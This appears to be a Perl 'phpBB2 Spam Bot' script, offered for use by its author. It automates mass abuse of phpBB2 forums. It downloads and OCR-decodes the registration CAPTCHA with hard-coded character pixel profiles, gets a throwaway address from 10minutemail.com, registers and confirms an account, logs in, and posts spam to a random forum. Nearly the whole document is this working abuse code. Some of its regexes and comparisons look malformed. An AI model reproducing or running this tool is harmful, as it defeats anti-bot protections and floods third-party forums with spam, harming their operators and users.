Code:
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# - -
# + phpBB2 Spam Bot +
# - Author: darkjoker -
# + Site : http://darkjoker.net23.net +
# - Usage : perl bot.pl <configuration_file> -
# + Configuration File Syntax: +
# - URL: http://victim_host/phpBB2_path -
# + Username: Spam_bot_nick +
# - Site: http://spam.com -
# + Subject: Post's subject +
# - Message on -
# + more lines +
# - -
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
sub banner
{
print
"\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+".
"\n- -".
"\n+ phpBB2 Spam Bot +".
"\n- Author: darkjoker -".
"\n+ Site : http://darkjoker.net23.net +".
"\n- Usage : perl bot.pl <configuration_file> -".
"\n+ Configuration File Syntax: +".
"\n- URL: http://victim_host/phpBB2_path -".
"\n+ Username: Spam_bot_nick +".
"\n- Site: http://spam.com -".
"\n+ Subject: Post's subject +".
"\n- Message on -".
"\n+ more lines +".
"\n- -".
"\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+".
"\n\n";
}
sub message_die
{
my $message = $_ [0];
print "[!] ${message}\n";
exit ();
}
sub get_values
{
my $chr = $_ [0];
my $hash = {
A => [13, 14, 14, 16, 16, 17, 18, 18, 19, 20, 20, 20, 20, 21, 20, 23, 24, 25, 25, 26, 26, 27, 27, 26, 20, 19, 18],
B => [19, 21, 22, 22, 23, 23, 22, 18, 18, 21, 22, 21, 21, 22, 23, 23, 22, 18, 17, 18, 22, 23, 23, 23, 22, 21, 20],
C => [13, 17, 20, 22, 23, 24, 24, 21, 19, 17, 12, 8, 8, 8, 8, 11, 16, 18, 20, 21, 23, 24, 23, 22, 21, 18, 15],
D => [17, 19, 20, 21, 22, 23, 22, 20, 18, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 19, 22, 23, 22, 21, 20, 19, 18],
E => [20, 21, 21, 21, 21, 21, 19, 8, 8, 17, 20, 21, 21, 21, 21, 21, 19, 8, 8, 8, 17, 21, 21, 21, 21, 21, 21],
F => [18, 19, 19, 19, 19, 19, 18, 8, 8, 15, 17, 18, 18, 18, 18, 18, 16, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8],
G => [16, 19, 21, 23, 25, 25, 25, 22, 18, 13, 9, 18, 21, 22, 22, 22, 23, 22, 22, 21, 25, 26, 25, 24, 24, 20, 17],
H => [16, 17, 17, 17, 17, 17, 17, 17, 22, 24, 24, 24, 24, 24, 24, 24, 23, 17, 17, 17, 17, 17, 17, 17, 17, 17, 16],
I => [16, 17, 17, 17, 17, 17, 17, 16, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 15, 17, 17, 17, 17, 17],
J => [ 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 14, 16, 18, 18, 20, 20, 20, 19, 18, 16, 13],
K => [19, 21, 21, 22, 21, 22, 22, 21, 20, 19, 19, 19, 19, 20, 21, 21, 22, 22, 21, 20, 19, 19, 19, 19, 19, 18, 18],
L => [ 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 16, 18, 19, 19, 19, 19, 19, 19],
M => [24, 25, 25, 25, 26, 27, 27, 27, 27, 27, 28, 28, 28, 28, 28, 28, 27, 27, 27, 27, 27, 25, 25, 25, 25, 25, 23],
N => [15, 16, 17, 17, 18, 19, 20, 21, 21, 22, 23, 23, 24, 24, 24, 23, 23, 22, 21, 21, 20, 19, 18, 18, 17, 16, 15],
O => [14, 19, 21, 23, 24, 25, 25, 23, 20, 19, 18, 17, 17, 17, 17, 18, 18, 19, 20, 23, 25, 25, 24, 24, 22, 19, 15],
P => [18, 19, 20, 21, 21, 21, 21, 18, 17, 17, 18, 20, 21, 21, 21, 20, 19, 18, 15, 8, 8, 8, 8, 8, 8, 8, 8],
Q => [14, 18, 21, 23, 24, 25, 25, 24, 20, 19, 19, 18, 17, 17, 17, 20, 24, 25, 26, 26, 26, 25, 25, 25, 25, 24, 22],
R => [20, 22, 23, 23, 24, 24, 23, 19, 19, 23, 24, 23, 22, 22, 20, 20, 20, 21, 19, 19, 19, 19, 19, 19, 19, 18, 17],
S => [15, 18, 20, 21, 22, 23, 22, 20, 18, 15, 18, 20, 21, 20, 20, 18, 20, 19, 18, 20, 22, 23, 23, 22, 20, 19, 16],
T => [22, 23, 23, 23, 23, 23, 21, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 9],
U => [16, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 21, 23, 24, 23, 22, 21, 19, 15],
V => [17, 18, 19, 20, 20, 21, 21, 20, 20, 21, 21, 20, 21, 21, 20, 20, 19, 18, 18, 17, 16, 16, 14, 14, 13, 12, 12],
W => [27, 30, 30, 30, 32, 33, 34, 34, 34, 33, 33, 33, 33, 33, 32, 31, 31, 30, 28, 27, 27, 27, 26, 23, 23, 23, 22],
X => [18, 20, 21, 21, 21, 21, 21, 20, 19, 18, 16, 16, 14, 14, 15, 16, 18, 19, 20, 22, 23, 22, 22, 22, 21, 19, 17],
Y => [18, 20, 22, 22, 23, 23, 22, 21, 19, 19, 17, 17, 15, 13, 13, 11, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 9],
Z => [21, 22, 22, 22, 22, 22, 20, 13, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 11, 11, 19, 22, 22, 22, 22, 22, 22],
1 => [ 7, 8, 9, 10, 12, 13, 14, 14, 14, 14, 14, 13, 12, 9, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 7],
2 => [13, 16, 18, 19, 20, 20, 19, 17, 17, 15, 9, 10, 12, 12, 12, 13, 13, 12, 12, 11, 17, 19, 20, 20, 20, 20, 20],
3 => [14, 17, 18, 19, 20, 20, 18, 16, 15, 12, 12, 12, 12, 13, 13, 13, 11, 8, 12, 15, 18, 19, 20, 19, 19, 17, 13],
4 => [ 9, 10, 11, 12, 13, 14, 14, 15, 16, 17, 18, 18, 17, 17, 16, 20, 22, 22, 22, 22, 22, 22, 20, 9, 9, 9, 8],
5 => [18, 19, 19, 19, 20, 19, 18, 8, 14, 16, 18, 19, 19, 20, 20, 17, 12, 8, 12, 15, 17, 19, 20, 19, 18, 16, 13],
6 => [12, 15, 17, 19, 19, 20, 17, 15, 13, 16, 18, 19, 20, 20, 20, 18, 16, 16, 16, 16, 18, 19, 20, 19, 19, 16, 14],
7 => [19, 20, 20, 20, 20, 20, 19, 10, 10, 10, 10, 9, 10, 9, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 8],
8 => [12, 15, 17, 19, 20, 20, 18, 16, 18, 19, 19, 18, 18, 19, 20, 20, 18, 16, 15, 16, 18, 20, 20, 20, 19, 18, 15],
9 => [13, 16, 18, 19, 19, 20, 18, 16, 16, 16, 16, 18, 19, 20, 20, 20, 19, 18, 15, 14, 17, 19, 19, 19, 18, 15, 12]
};
return @{$hash->{$chr}};
}
banner ();
my $config_file = shift or message_die ("No configuration file specified.");
open (CONFIG, "<${config_file}");
my @info = <CONFIG>;
$info [0] =~ /URL: http://(.+?)(/.+)/;
my ($host, $path) = ($1, $2);
$info [1] =~ /Username: (.+)/;
my $nick = $1;
$info [2] =~ /Site: (.+)/;
my $site = $1;
$info [3] =~ /Subject: (.+)/;
my $subject = $1;
shift (@info);
shift (@info);
shift (@info);
shift (@info);
my $message = join ("", @info);
message_die ("Configuration file uses a wrong syntax.") if ((!$host) || (!$path) || (!$nick) || (!$site) || (!$subject) || (!$message));
open (CAPATCHA, ">capatcha.png");
my $sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp"
) or message_die ($!);
my $get = "GET ${path}/profile.php?mode=register&agreed=true HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n\r\n";
print $sock $get;
my $reply;
while (<$sock>)
{
chomp ($_);
$reply .= $_;
}
close ($sock);
$reply =~ s/&/&/g;
$reply =~ /<img src="profile\.php\?mode=confirm&id=(.+?)"/;
my $img = "${path}/profile.php?mode=confirm&id=${1}";
$reply =~ /(phpbb2mysql_data=.+?);.+?(phpbb2mysql_sid=.+?);/;
my $cookie = "Cookie: ${1}; ${2}\r\n";
$reply =~ /<input type="hidden" name="sid" value="(.+?)" />/;
my $sid = $1;
$reply =~ /<input type="hidden" name="confirm_id" value="(.+?)" />/;
my $confirm_id = $1;
$get = "GET ${img} HTTP/1.1\r\n".
"Host: ${host}\r\n".
$cookie .
"Connection: Close\r\n\r\n";
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
);
print $sock $get;
my $k = 0;
while (<$sock>)
{
$k = 1 if ($_ =~ /PNG/);
print CAPATCHA $_ if ($k);
}
close ($sock);
close (CAPATCHA);
print "[+] Capatcha image downloaded successfully.\n";
system ("convert -compress None capatcha.png capatcha.ppm");
print "[+] Capatcha image converted from PNG to PPM successfully.\n";
my $code;
my @chars = qw {A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9};
my $limit = 15;
open (CAPATCHA, "<capatcha.ppm");
my @c = <CAPATCHA>;
shift (@c);
shift (@c);
shift (@c);
my @b;
while (@c)
{
my @shift = split (" ", shift (@c));
foreach my $tm (@shift)
{
push (@b, $tm);
}
}
my ($y, $x) = (0, 0);
my @a;
while (@b)
{
$a [$y] [$x] = shift (@b);
shift (@b);
shift (@b);
$x++;
if ($x == 320)
{
$y++;
$x = 0;
}
}
$x = 0;
my @val;
while ($x < 320)
{
$y = 0;
$k = 0;
while ($y < 49)
{
$k = 1 if ($a [$y] [$x] <= 100);
$y++;
}
push (@val, $x) if ($k);
$x++;
}
my @coords;
while (@val)
{
my ($min, $max) = (shift (@val), 0);
my $tm = 0;
while (1)
{
$max = shift (@val);
$max = 0 if (!$max);
if (($max != $tm+1) && ($tm))
{
$max = $tm;
last;
}
$tm = $max;
}
$tm = $min;
my ($n, $min_y, $max_y) = (0, 0, 0);
while ($n < 50)
{
$min = $tm;
while ($min < $max)
{
if (($a [$n] [$min] <= 100) && (!$min_y))
{
$min_y = $n;
$max_y = $min_y+27;
}
$min++;
}
$n++;
}
$min = $tm;
push (@coords, $min);
push (@coords, $max);
push (@coords, $min_y);
push (@coords, $max_y);
}
close (CAPATCHA);
my $cnt = 1;
while ($cnt <= 6)
{
my @tmp;
my $min_x = shift (@coords);
my $max_x = shift (@coords);
my $min_y = shift (@coords);
my $max_y = shift (@coords);
my $tm_x = $min_x;
my $n = 0;
while ($min_y < $max_y)
{
$min_x = $tm_x;
while ($min_x < $max_x)
{
$tmp [$n]++ if (($a [$min_y-1] [$min_x-1] <= 100) || ($a [$min_y-1] [$min_x] <= 100) || ($a [$min_y-1] [$min_x+1] <= 100) || ($a [$min_y] [$min_x-1] <= 100) || ($a [$min_y] [$min_x] <= 100) || ($a [$min_y] [$min_x+1] <= 100) || ($a [$min_y+1] [$min_x-1] <= 100) || ($a [$min_y+1] [$min_x] <= 00) || ($a [$min_y+1] [$min_x+1] <= 100));
$min_x++;
}
$min_y++;
$n++;
}
my $end;
foreach my $char (@chars)
{
@val = get_values ($char);
$k = 1;
$n = 0;
while ($n < 27)
{
$k = 0 if (!(($tmp [$n] < $val [$n]+$limit) && ($tmp [$n] > $val [$n]-$limit)));
$n++;
}
if ($k)
{
if (!$end)
{
$end = $char;
}
else
{
my ($err_crt, $err_prc) = 0;
$n = 0;
my @vals = get_values ($end);
while ($n < 27)
{
$err_crt += abs ($tmp [$n]-$val [$n]);
$err_prc += abs ($tmp [$n]-$vals [$n]);
$n++;
}
$end = $char if ($err_crt < $err_prc);
}
}
}
$cnt++;
$code .= $end;
}
print "[+] Capatcha's code read successfully: ${code}\n";
$sock = new IO::Socket::INET (
PeerHost => "10minutemail.com",
PeerPort => 80,
Proto => "tcp"
) or message_die ("10 Minute Mail's service is not disponible. Please try again later.");
$get = "GET /10MinuteMail/index.html HTTP/1.1\r\n".
"Host: 10minutemail.com\r\n".
"Connection: Close\r\n\r\n";
print $sock $get;
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
$reply =~ /name="addyForm:addressSelect" value="(.+?)" size="30"/;
my $email = $1;
$reply =~ /(JSESSIONID=.+?);/;
my $mail_cookie = "Cookie: ${1}\r\n";
print "[+] New email address has been created successfully: ${email}\n";
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp"
);
my $post = "username=${nick}&email=${email}&new_password=PASSWORD&password_confirm=PASSWORD&confirm_code=${code}&website=${site}&mode=register&agreed=true&coppa=0&sid=${sid}&confirm_id=${confirm_id}&submit=Send";
$get = "POST ${path}/profile.php HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n".
$cookie.
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: " . length ($post) . "\r\n\r\n".
$post;
print $sock $get;
close ($sock);
my $seconds = 60; # Edit this value to increase/decrease the stand-by time
print "[+] ${nick} has been registered successfully!\n".
"[+] Waiting ${seconds} seconds to receive the email from ${host}...\n";
sleep ($seconds);
$sock = new IO::Socket::INET (
PeerHost => "10minutemail.com",
PeerPort => 80,
Proto => "tcp",
);
$get = "GET /10MinuteMail/index.html HTTP/1.1\r\n".
"Host: 10minutemail.com\r\n".
$mail_cookie.
"Connection: Close\r\n\r\n";
print $sock $get;
$reply = "";
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
$reply =~ s/&/&/g;
$reply =~ /<td><a href="(\/10MinuteMail\/index\.html\?dataModelSelection=.+?)".+?</a>/;
my $link = $1;
$sock = new IO::Socket::INET (
PeerHost => "10minutemail.com",
PeerPort => 80,
Proto => "tcp",
);
$get = "GET ${link} HTTP/1.1\r\n".
"Host: 10minutemail.com\r\n".
$mail_cookie.
"Connection: Close\r\n\r\n";
print $sock $get;
$reply = "";
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
$reply =~ /Location: http://10minutemail.com(/10MinuteMail/read.html?cid=[0-9]{1,})/;
$link = $1;
$sock = new IO::Socket::INET (
PeerHost => "10minutemail.com",
PeerPort => 80,
Proto => "tcp",
);
$get = "GET ${link} HTTP/1.1\r\n".
"Host: 10minutemail.com\r\n".
$mail_cookie.
"Connection: Close\r\n\r\n";
print $sock $get;
$reply = "";
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
$link = "";
$reply =~ /<br />http://$host(.+?)<br />/;
$link = $1;
$link =~ s/&/&/g;
if ($link)
{
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
);
$get = "GET ${link} HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n\r\n";
print $sock $get;
close ($sock);
}
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp"
);
$post = "username=${nick}&password=PASSWORD&login=Log+in";
$get = "POST ${path}/login.php HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n".
"Content-Length: " . length ($post) . "\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n\r\n".
$post;
print $sock $get;
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
$reply =~ /(phpbb2mysql_data=.+?);.+(phpbb2mysql_sid=.+?);/;
$cookie = "Cookie: ${1}; ${2}\r\n";
print "[+] Logged in successfully.\n";
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
);
$get = "GET ${path}/index.php HTTP/1.1\r\n".
"Host: $host\r\n".
$cookie.
"Connection: Close\r\n\r\n";
print $sock $get;
$reply = "";
while (<$sock>)
{
chomp $_;
$reply .= $_;
}
close ($sock);
my @forums;
while ($reply =~ /viewforum.php?f=([1-9]{1,})/)
{
push (@forums, $1);
$reply =~ s/viewforum.php?f=([1-9]{1,})//;
}
my $id = $forums [int (rand (scalar (@forums)))];
$sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp"
);
$cookie =~ /sid=([a-f0-9]{32})/;
$sid = $1;
$post = "subject=${subject}&message=${message}&sid=${sid}&mode=newtopic&f=${id}&post=Send";
$get = "POST ${path}/posting.php HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n".
$cookie.
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: " . length ($post) . "\r\n\r\n".
$post;
print $sock $get;
close ($sock);
print "[+] The topic has been posted successfully.\n".
"[+] Removing temporary files...\n";
unlink ("capatcha.png");
unlink ("capatcha.ppm");
print "[+] Done.\n"; |
